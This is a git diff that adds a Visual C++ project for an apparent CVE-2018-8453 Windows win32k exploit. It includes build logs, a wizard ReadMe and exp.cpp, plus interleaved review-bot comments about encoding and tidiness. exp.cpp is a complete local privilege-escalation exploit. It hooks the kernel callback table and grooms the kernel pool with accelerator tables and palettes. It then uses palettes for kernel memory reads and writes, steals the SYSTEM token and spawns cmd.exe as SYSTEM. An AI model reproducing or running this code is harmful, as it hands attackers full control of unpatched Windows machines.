diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.obj
new file mode 100644
index 0000000..dcb8e37
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.pch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.pch
new file mode 100644
index 0000000..0bcf152
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.pch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..5a7107a
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..02ec268
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..7714a95
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/exp.lastbuildstate b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/exp.lastbuildstate
new file mode 100644
index 0000000..84e7425
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/exp.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Debug|Win32|c:\users\ze0r\desktop\exp\|
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..3ac3afb
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..1c9bcd5
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..d8a9c0e
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/exp.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/stdafx.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/stdafx.obj
new file mode 100644
index 0000000..8b0f3c4
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/stdafx.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/vc140.idb b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/vc140.idb
new file mode 100644
index 0000000..6e64077
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/vc140.idb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/vc140.pdb b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/vc140.pdb
new file mode 100644
index 0000000..1e806de
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Debug/vc140.pdb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/ReadMe.txt b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/ReadMe.txt
new file mode 100644
index 0000000..5b66131
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/ReadMe.txt
@@ -0,0 +1,30 @@
+========================================================================
+ 控制台应用程序:exp 项目概述
+========================================================================
+
+应用程序向导已为您创建了此 exp 应用程序。
+
+本文件概要介绍组成 exp 应用程序的每个文件的内容。
+
+
+exp.vcxproj
+ 这是使用应用程序向导生成的 VC++ 项目的主项目文件,其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
+
+exp.vcxproj.filters
+ 这是使用“应用程序向导”生成的 VC++ 项目筛选器文件。它包含有关项目文件与筛选器之间的关联信息。在 IDE 中,通过这种关联,在特定节点下以分组形式显示具有相似扩展名的文件。例如,“.cpp”文件与“源文件”筛选器关联。
+
+exp.cpp
+ 这是主应用程序源文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他标准文件:
+
+StdAfx.h, StdAfx.cpp
+ 这些文件用于生成名为 exp.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他注释:
+
+应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
+
+/////////////////////////////////////////////////////////////////////////////
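Review bot: this is the untouched Visual C++ wizard ReadMe (it only describes exp.vcxproj, exp.vcxproj.filters, exp.cpp and the StdAfx files as generated by the wizard) and adds no information about the project. Either delete it or replace it with what a user of this directory actually needs and which the code currently carries only in a comment: the single Windows build the hard-coded `gConfig` offsets were taken from, and that only the Win32 configuration is meant to build.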
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.Build.CppClean.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.Build.CppClean.log
new file mode 100644
index 0000000..dfcdb2b
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.Build.CppClean.log
@@ -0,0 +1,14 @@
+c:\users\ze0r\desktop\exp\exp\release\exp.pch
+c:\users\ze0r\desktop\exp\exp\release\vc140.pdb
+c:\users\ze0r\desktop\exp\exp\release\stdafx.obj
+c:\users\ze0r\desktop\exp\exp\release\exp.obj
+c:\users\ze0r\desktop\exp\release\exp.exe
+c:\users\ze0r\desktop\exp\release\exp.ipdb
+c:\users\ze0r\desktop\exp\release\exp.iobj
+c:\users\ze0r\desktop\exp\release\exp.pdb
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\exp\exp\release\exp.tlog\link.write.1.tlog
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.log b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.log
new file mode 100644
index 0000000..fc264c8
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.log
@@ -0,0 +1,7 @@
+ stdafx.cpp
+ exp.cpp
+ 正在生成代码
+ All 20 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
+ 已完成代码的生成
+ exp.vcxproj -> c:\users\ze0r\desktop\exp\Release\exp.exe
+ exp.vcxproj -> c:\users\ze0r\desktop\exp\Release\exp.pdb (Full PDB)
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.obj
new file mode 100644
index 0000000..331bd58
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.pch b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.pch
new file mode 100644
index 0000000..6933438
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.pch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..647b9d7
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..6d7ddf0
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..9d55f25
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/exp.lastbuildstate b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/exp.lastbuildstate
new file mode 100644
index 0000000..e1b782c
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/exp.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Release|Win32|c:\users\ze0r\desktop\exp\|
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.command.1.tlog
new file mode 100644
index 0000000..f3e4814
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.read.1.tlog
new file mode 100644
index 0000000..865d309
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.write.1.tlog
new file mode 100644
index 0000000..b7c7941
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/exp.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/stdafx.obj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/stdafx.obj
new file mode 100644
index 0000000..77c28d7
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/stdafx.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/vc140.pdb b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/vc140.pdb
new file mode 100644
index 0000000..07e2c76
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/Release/vc140.pdb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.cpp b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.cpp
new file mode 100644
index 0000000..c440910
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.cpp
@@ -0,0 +1,407 @@
+#include "stdio.h"
+#include "stdafx.h"
+#include "windows.h"
+#include "psapi.h"
+
+BOOL bMSGSENT = FALSE;
+HWND hMainWND;
+HWND hSBWND;
+HWND hSBWNDnew;
+DWORD SystemCallStub;
+CHAR flag[0x80] = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ze0r is so cool!";
+
+HPALETTE hManager;
+HPALETTE hWorker;
+HPALETTE hKeep;
+HDC hKeepDC = NULL;
+PDWORD CallbackTb = 0;
+LPACCEL lpAccel;
+
+typedef VOID(WINAPI * fct_fnDispatch)(PDWORD msg);
+
+fct_fnDispatch fnDWORD;
+fct_fnDispatch fnClientFreeWindowClassExtraBytes;
+
+typedef struct
+{
+ DWORD UniqueProcessIdOffset;
+ DWORD TokenOffset;
+} VersionSpecificConfig;
+
+VersionSpecificConfig gConfig = { 0xb4, 0xfc }; // Win 10 15063 rs2 x86
+
+LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
+INT_PTR CALLBACK About(HWND, UINT, WPARAM, LPARAM);
+
+void SetWindowFNID(HWND hWnd, DWORD FNID) {
+ __asm {
+ mov esi, esi;
+ mov eax, hWnd;
+ push FNID;
+ push eax;
+ push 0;
+ mov eax, 0x1202;
+ mov edx, SystemCallStub;
+ call edx;
+ add esp, 0x0c;
+ }
+}
+
+int SetLinkedUFIs(HDC hdc, int len) {
+ int retvalue;
+ __asm {
+ push len;
+ lea eax, flag;
+ PUSH eax;
+ push hdc;
+ push 0;
+ mov eax, 0x1023;
+ mov edx, SystemCallStub;
+ call edx;
+ add esp, 0x10;
+ mov retvalue, eax;
+ }
+ return retvalue;
+}
+
+DWORD buf[0x240];
+
+void ReadMem(DWORD Addr, DWORD len) {
+ memset(buf, 0, 0x240 * 4);
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = Addr;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ GetPaletteEntries(hWorker, 0, len, (LPPALETTEENTRY)buf);
+}
+
+ULONG GetNTOsBase()
+{
+ ULONG Bases[0x1000];
+ DWORD needed = 0;
+ ULONG krnlbase = 0;
+ if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
+ krnlbase = Bases[0];
+ }
+ return krnlbase;
+}
+
+DWORD_PTR PsInitialSystemProcess(VOID)
+{
+ ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+ ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
+ FreeLibrary((HMODULE)Module);
+ ULONG res = 0;
+ ULONG ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ ReadMem(Addr - Module + ntOsBase, 16);
+ res = buf[0];
+ }
+ return res;
+}
+
+ULONG PsGetCurrentProcess(DWORD sysEPS)
+{
+ ULONG pEPROCESS = sysEPS;
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG), 16);
+ while (TRUE) {
+ pEPROCESS = buf[1] - gConfig.UniqueProcessIdOffset - sizeof(ULONG);
+ ReadMem(pEPROCESS + gConfig.UniqueProcessIdOffset, 16);
+ if (GetCurrentProcessId() == buf[0]) {
+ return pEPROCESS;
+ }
+ }
+}
+
+DWORD_PTR GetKernelHandleTable(VOID)
+{
+ ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+ ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "KeServiceDescriptorTable");
+ FreeLibrary((HMODULE)Module);
+ ULONG res = 0;
+ ULONG DestroyAcceleratorTableAddr = 0;
+ ULONG HMValidateHandleAddr = 0;
+ ULONG ntOsBase = GetNTOsBase();
+ if (ntOsBase) {
+ //��ȻKeServiceDescriptorTableShadowδ����������λ��KeServiceDescriptorTable - 0x40�ĵط���
+ ReadMem(Addr - Module + ntOsBase - 0x40, 16 * 6);
+ //��ȡwin32k!NtUserDestroyAcceleratorTable������ַ
+ ReadMem(buf[4] + 0x500, 16);
+ ReadMem(buf[0] + 2, 16);
+ //��ȡwin32kfull!NtUserDestroyAcceleratorTable
+ ReadMem(buf[0], 16);
+ DestroyAcceleratorTableAddr = buf[0] + 0x18;
+ //��ȡwin32kfull!HMValidateHandle
+ ReadMem(DestroyAcceleratorTableAddr, 16);
+ //�ҵ�gpKernelHandleTable
+ HMValidateHandleAddr = DestroyAcceleratorTableAddr + buf[0] + 4 + 0x39;
+ ReadMem(HMValidateHandleAddr, 16);
+ ReadMem(buf[0], 16);
+ ReadMem(buf[0], 16);
+ res = buf[0];
+ }
+ return res;
+}
+
+HPALETTE CreatePaletteOfSize(int size, DWORD value) {
+ int pal_cnt = (size - 0x60) / 4;
+ int palsize = sizeof(LOGPALETTE) + (pal_cnt - 1) * sizeof(PALETTEENTRY);
+ LOGPALETTE *lPalette = (LOGPALETTE*)malloc(palsize);
+ memset(lPalette, value, palsize);
+ lPalette->palNumEntries = pal_cnt;
+ lPalette->palVersion = 0x300;
+ return CreatePalette(lPalette);
+}
+
+
+HACCEL hAccel_0xC10_top[2000];
+HACCEL hAccel_0x50_middle[3000];
+HACCEL hAccel_0x3B0_bottom[2000];
+HACCEL hAccel_ReusePalette[8000];
+HDC hDC_Writer[3000];
+HPALETTE hPalettes[10000];
+
+void BeforSBTrackAlloc() {
+
+ for (int i = 0; i < 3000; i++) {
+ hDC_Writer[i] = CreateCompatibleDC(NULL);
+ }
+
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0xC10_top[i] = CreateAcceleratorTableW(lpAccel, 0x1FD);
+ }
+
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0x3B0_bottom[i] = CreateAcceleratorTableW(lpAccel, 0x95);
+ }
+
+ for (int i = 0; i < 3000; i++) {
+ hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 8);
+ }
+ for (int i = 1000; i < 3000; i += 2) {
+ DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+ }
+}
+
+void _cdecl AfterSBTrackAlloc() {
+ for (int i = 0; i < 3000; i++) {
+ DestroyAcceleratorTable(hAccel_0x50_middle[i]);
+ }
+ //������Ϣ,ϵͳ�ͷ�SBTrack;
+ SendMessage(hSBWNDnew, WM_CANCELMODE, 0, 0);
+ //�ͷ�0x3a0��ռ�ÿռ�,��0x3a0�������SBTrack(size=0x50)�ϲ�Ϊ0x3f0��С;
+ for (int i = 0; i < 2000; i++) {
+ DestroyAcceleratorTable(hAccel_0x3B0_bottom[i]);
+ }
+
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 0x7D);
+ }
+}
+
+void FindManagerAndWorker() {
+
+ for (int i = 0; i < 2000; i++) {
+ DestroyAcceleratorTable(hAccel_0xC10_top[i]);
+ }
+ for (int i = 0; i < 3000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0xb30, 0x66);
+ }
+ for (int i = 0; i < 2000; i++) {
+ hAccel_0x50_middle[i] = CreateAcceleratorTableW(lpAccel, 0x26);
+ }
+ for (int i = 3000; i < 10000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0x100, 0x88);
+ }
+
+ *((DWORD *)flag) = 0x501;
+ *((DWORD *)flag + 1) = 0xFFFF;
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 1);
+ }
+ memset(buf, 0, 0x240 * 4);
+ for (int i = 3000; i < 10000; i++) {
+ if (GetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf)) {
+ hKeep = hPalettes[i];
+ hManager = (HPALETTE)*buf;
+ hWorker = (HPALETTE)*(buf + 64);
+ *(buf + 5) = 0xFFFF;
+ *(buf + 69) = 0xFFFF;
+ SetPaletteEntries(hPalettes[i], 0x2B, 80, (LPPALETTEENTRY)buf);
+ }
+ }
+
+ *((DWORD *)flag) = 0x501;
+ *((DWORD *)flag + 1) = 0x28;
+ for (int i = 0; i < 3000; i++) {
+ SetLinkedUFIs(hDC_Writer[i], 1);
+ if (!hKeepDC && (!GetPaletteEntries(hKeep, 0x2B, 80, (LPPALETTEENTRY)buf))) {
+ hKeepDC = hDC_Writer[i];
+ }
+ }
+}
+
+void GetSystem() {
+
+ ULONG SelfToken = 0;
+ ULONG SystemToken = 0;
+ DWORD ACCELHandle = 0;
+ DWORD SystemEPS;
+ DWORD CurrentEPS;
+ DWORD pKernelHandleTable;
+
+ STARTUPINFO stStartUpInfo = { sizeof(stStartUpInfo) };
+ PROCESS_INFORMATION pProcessInfo;
+ WCHAR cmd[] = L"c:\\\\windows\\\\system32\\\\cmd.exe";
+
+ printf("[*] Find Manager and Worker.\n");
+ FindManagerAndWorker();
+ SystemEPS = PsInitialSystemProcess();
+ CurrentEPS = PsGetCurrentProcess(SystemEPS);
+ pKernelHandleTable = GetKernelHandleTable();
+
+ ReadMem(SystemEPS + gConfig.TokenOffset, 16);
+ SystemToken = buf[0];
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = CurrentEPS + gConfig.TokenOffset;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+ GetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+ SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SystemToken);
+
+ Sleep(500);
+ printf("[*] Swaping shell.\n\n");
+ ZeroMemory(&stStartUpInfo, sizeof(STARTUPINFO));
+ stStartUpInfo.cb = sizeof(STARTUPINFO);
+ stStartUpInfo.dwFlags = STARTF_USESHOWWINDOW;
+ stStartUpInfo.wShowWindow = 1;
+ CreateProcess(cmd, NULL, NULL, NULL, FALSE, NULL, NULL, NULL, &stStartUpInfo, &pProcessInfo);
+ Sleep(1000);
+ SetPaletteEntries(hWorker, 0, 1, (LPPALETTEENTRY)&SelfToken);
+
+ for (int i = 3000; i < 10000; i++) {
+ if ((hPalettes[i] != hManager) && (hPalettes[i] != hWorker)) {
+ DeleteObject(hPalettes[i]);
+ }
+ }
+ for (int i = 0; i < 8000; i++) {
+ hAccel_ReusePalette[i] = CreateAcceleratorTableW(lpAccel, 0x22);
+ }
+
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ ReadMem(buf[20] - 0x1f0, 16);
+ ACCELHandle = buf[0];
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = pKernelHandleTable + (ACCELHandle & 0xffff) * 8;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+
+ DeleteDC(hKeepDC);
+
+ buf[0] = 0;
+ buf[1] = 0;
+ SetPaletteEntries(hWorker, 0, 2, (LPPALETTEENTRY)buf);
+}
+
+void fnDWORDCallBack(PDWORD msg) {
+
+ if (bMSGSENT && *msg && (*((DWORD*)(*msg)) == (DWORD)hSBWND)) {
+ bMSGSENT = FALSE;
+ DestroyWindow(hMainWND);
+ }
+
+ //WM_TIMER��ʶScrollBar�Ѿ���ʼѭ��������Ϣ����ǿ���˳�xxxSBTrackLoop;
+ if (*msg && *(msg + 1) == WM_TIMER) {
+ printf("[*] Cancel xxxSBTrackLoop.\n");
+ SetCapture(hSBWNDnew);
+ }
+
+ if (*msg && (*(msg + 1) == 0x70) && (*((DWORD*)(*msg)) == (DWORD)hMainWND)) {
+ printf("[*] ReAlloc Memory.\n");
+ _asm pushad;
+ AfterSBTrackAlloc();
+ _asm popad;
+ }
+ fnDWORD(msg);
+}
+
+void fnClientFreeWindowClassExtraBytesCallBack(PDWORD msg) {
+
+ if ((HWND)*(msg + 3) == hMainWND) {
+ hSBWNDnew = CreateWindowEx(0, L"ScrollBar", L"SB", SWP_HIDEWINDOW | SB_HORZ, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
+ printf("[*] Set Window FNID.\n");
+ SetWindowFNID(hMainWND, 0x2A1);
+ SetCapture(hSBWNDnew);
+ }
+ fnClientFreeWindowClassExtraBytes(msg);
+}
+
+int main()
+{
+ printf("////////////////////////////////////////////////////////\n");
+ printf("// //\n");
+ printf("// CVE-2018-8453 EXPLOIT //\n");
+ printf("// Date : 2019/1/15 //\n");
+ printf("// Author: ze0r //\n");
+ printf("////////////////////////////////////////////////////////\n\n");
+
+ DWORD OldProtect = 0;
+ _asm {
+ push eax;
+ mov eax, fs:[0x30];
+ lea eax, [eax + 0x2c];
+ mov eax, [eax];
+ mov CallbackTb, eax;
+ pop eax;
+ }
+ VirtualProtect(CallbackTb, 512, PAGE_READWRITE, &OldProtect);
+ CallbackTb += 2;
+ fnDWORD = (fct_fnDispatch)*CallbackTb;
+ *CallbackTb = (DWORD)fnDWORDCallBack;
+
+ CallbackTb += 126;
+ fnClientFreeWindowClassExtraBytes = (fct_fnDispatch)*CallbackTb;
+ *CallbackTb = (DWORD)fnClientFreeWindowClassExtraBytesCallBack;
+
+ VirtualProtect(CallbackTb, 512, OldProtect, &OldProtect);
+ SystemCallStub = (DWORD)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "KiFastSystemCall");
+ lpAccel = (LPACCEL)malloc(sizeof(ACCEL) * 2);
+ SecureZeroMemory(lpAccel, sizeof(ACCEL));
+
+ WNDCLASSEXW wndClass = { 0 };
+ wndClass = { 0 };
+ wndClass.cbSize = sizeof(WNDCLASSEXW);
+ wndClass.lpfnWndProc = DefWindowProc;
+ wndClass.cbClsExtra = 0;
+ wndClass.cbWndExtra = 1;
+ wndClass.hInstance = GetModuleHandleA(NULL);
+ wndClass.lpszMenuName = NULL;
+ wndClass.lpszClassName = L"WNDCLASSMAIN";
+
+ RegisterClassExW(&wndClass);
+ printf("[*] CreateWindow.\n");
+ hMainWND = CreateWindowW(L"WNDCLASSMAIN", L"CVE", WS_DISABLED, 0, 0, 0, 0, nullptr, nullptr, GetModuleHandleA(NULL), nullptr);
+ hSBWND = CreateWindowEx(0, L"ScrollBar", L"SB", WS_CHILD | WS_VISIBLE | SBS_HORZ, 0, 0, 3, 3, hMainWND, NULL, GetModuleHandleA(NULL), NULL);
+ SetScrollRange(hSBWND, SB_CTL, 0, 3, TRUE);
+ SetScrollPos(hSBWND, SB_CTL, 3, TRUE);
+ ShowWindow(hMainWND, SW_SHOW);
+ UpdateWindow(hMainWND);
+
+ ///////////////////////////////////////////////////////////////////////////////////
+ //��ռ�þ��������֮�ֳط�ˮʱ������Ķ�����������Ҳ���
+ for (int i = 0; i < 10000; i++) {
+ hPalettes[i] = CreatePaletteOfSize(0xa0, 0x22);
+ }
+ for (int i = 9990; i >= 0; i--) {
+ DeleteObject(hPalettes[i]);
+ }
+ ///////////////////////////////////////////////////////////////////////////////////
+ printf("[*] Deploy Memory.\n");
+ BeforSBTrackAlloc();
+ printf("[*] SendMessage.\n");
+ bMSGSENT = TRUE;
+ SendMessage(hSBWND, WM_LBUTTONDOWN, 0, 0x00020002);
+
+ GetSystem();
+
+ free(lpAccel);
+ return TRUE;
+}
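Review bot: the comments in fnDWORDCallBack (above the WM_TIMER check) and in main (above the 10000-palette spray loop) are unreadable mojibake, so exp.cpp was committed in the developer's locale code page rather than UTF-8; save the file as UTF-8 with a BOM so the comments survive and MSVC stops raising C4819 on other locales. Two smaller points in main: `wndClass = { 0 };` repeats the zero-initialisation already done on the declaration line, and `return TRUE;` is an odd process exit code where `return 0;` is meant.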
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.vcxproj b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.vcxproj
new file mode 100644
index 0000000..418e0c9
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/exp_CUI/exp/exp.vcxproj
@@ -0,0 +1,165 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ {28183B36-FF5A-4240-9BBC-60E767FADB82}
+ Win32Proj
+ exp
+ 8.1
+
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+ Application
+ true
+ v140
+ Unicode
+
+
+ Application
+ false
+ v140
+ true
+ Unicode
+
+
+
